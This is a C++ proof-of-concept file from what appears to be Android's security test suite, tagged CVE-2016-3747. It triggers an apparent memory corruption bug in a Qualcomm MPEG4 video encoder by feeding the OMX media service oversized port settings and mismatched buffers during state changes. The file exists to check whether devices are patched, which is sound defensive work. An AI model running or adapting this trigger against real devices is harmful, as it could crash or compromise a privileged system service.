/**
 * Copyright (C) 2018 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define LOG_TAG "CVE-2016-3747"

#include <OMX_Component.h>
#include <binder/MemoryDealer.h>
#include <log/log.h>
#include <media/IOMX.h>
#include <media/OMXBuffer.h>
#include <media/stagefright/OMXClient.h>
#include <utils/StrongPointer.h>

using namespace android;

struct DummyOMXObserver : public BnOMXObserver {
 public:
  DummyOMXObserver() {}

  virtual void onMessages(const std::list<omx_message> &messages __unused) {}

 protected:
  virtual ~DummyOMXObserver() {}
};

bool fuzzIOMXQcomEnc() {
  sp<IOMXNode> node;
  sp<IOMX> mOmx;
  int fenceFd = -1;
  const char *name = "OMX.qcom.video.encoder.mpeg4";

  std::unique_ptr<OMX_PARAM_PORTDEFINITIONTYPE> params(new OMX_PARAM_PORTDEFINITIONTYPE);
  params->nPortIndex = 0;  // input port
  params->format.video.nFrameHeight = 1280 * 4;
  params->format.video.nFrameWidth = 720 * 4;
  params->nBufferCountActual = 12;
  params->nBufferSize = 73728;
  params->nBufferCountMin = 0x4;

  int inMemSize = params->nBufferSize * 12;
  int outMemSize = 49152 * 4;
  int inBufferCnt = 12;
  int outBufferCnt = 4;
  int inBufferSize = inMemSize / inBufferCnt;
  int outBufferSize = outMemSize / outBufferCnt;

  sp<IMemory> memory;

  OMXClient client;
  if (client.connect() != OK) {
    ALOGE("OMXClient connect == NULL");
    return false;
  }

  mOmx = client.interface();
  if (mOmx == NULL) {
    ALOGE("OMXClient interface mOmx == NULL");
    client.disconnect();
    return false;
  }

  sp<DummyOMXObserver> observer = new DummyOMXObserver();
  status_t err = mOmx->allocateNode(name, observer, &node);
  if (err != OK) {
    ALOGI("%s node allocation fails", name);
    return false;
  }
  // make venc in invalid state
  err = node->sendCommand(OMX_CommandStateSet, 2);
  if (err != OK) {
    ALOGE("sendCommand is failed in OMX_StateIdle, err: %d", err);
    node->freeNode();
    return false;
  }

  sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
  std::unique_ptr<IOMX::buffer_id[]> inBufferId(new IOMX::buffer_id[inBufferCnt]);
  for (int i = 0; i < inBufferCnt; i++) {
    sp<IMemory> memory = dealerIn->allocate(inBufferSize);
    if (memory.get() == nullptr) {
      ALOGE("memory allocate failed for port index 0, err: %d", err);
      node->freeNode();
      return false;
    }
    OMXBuffer omxInBuf(memory);
    err = node->useBuffer(0, omxInBuf, &inBufferId[i]);
    ALOGI("useBuffer, port index 0, err: %d", err);
  }

  sp<MemoryDealer> dealerOut = new MemoryDealer(outMemSize);
  std::unique_ptr<IOMX::buffer_id[]> outBufferId(new IOMX::buffer_id[outBufferCnt]);
  for (int i = 0; i < outBufferCnt; i++) {
    sp<IMemory> memory = dealerOut->allocate(outBufferSize);
    if (memory.get() == nullptr) {
      ALOGE("memory allocate failed for port index 1, err: %d", err);
      node->freeNode();
      return false;
    }
    OMXBuffer omxOutBuf(memory);
    err = node->useBuffer(1, omxOutBuf, &outBufferId[i]);
    ALOGI("useBuffer, port index 1, err: %d", err);
  }

  // make venc in invalid state
  err = node->sendCommand(OMX_CommandStateSet, 3);
  ALOGI("sendCommand, err: %d", err);
  if (err != OK) {
    ALOGE("sendCommand is failed in OMX_StateExecuting, err: %d", err);
    node->freeNode();
    return false;
  }

  OMXBuffer omxInBuf(memory);
  for (int i = 0; i < inBufferCnt; i++) {
    err = node->emptyBuffer(inBufferId[i], omxInBuf, 0, 0, fenceFd);
    ALOGI("emptyBuffer, err: %d", err);
  }

  OMXBuffer omxOutBuf(memory);
  for (int i = 0; i < outBufferCnt; i++) {
    err = node->fillBuffer(outBufferId[i], omxOutBuf, fenceFd);
    ALOGI("fillBuffer, err: %d", err);
  }
  err = node->freeNode();
  ALOGI("freeNode, err: %d", err);
  return true;
}

int main() { return fuzzIOMXQcomEnc(); }
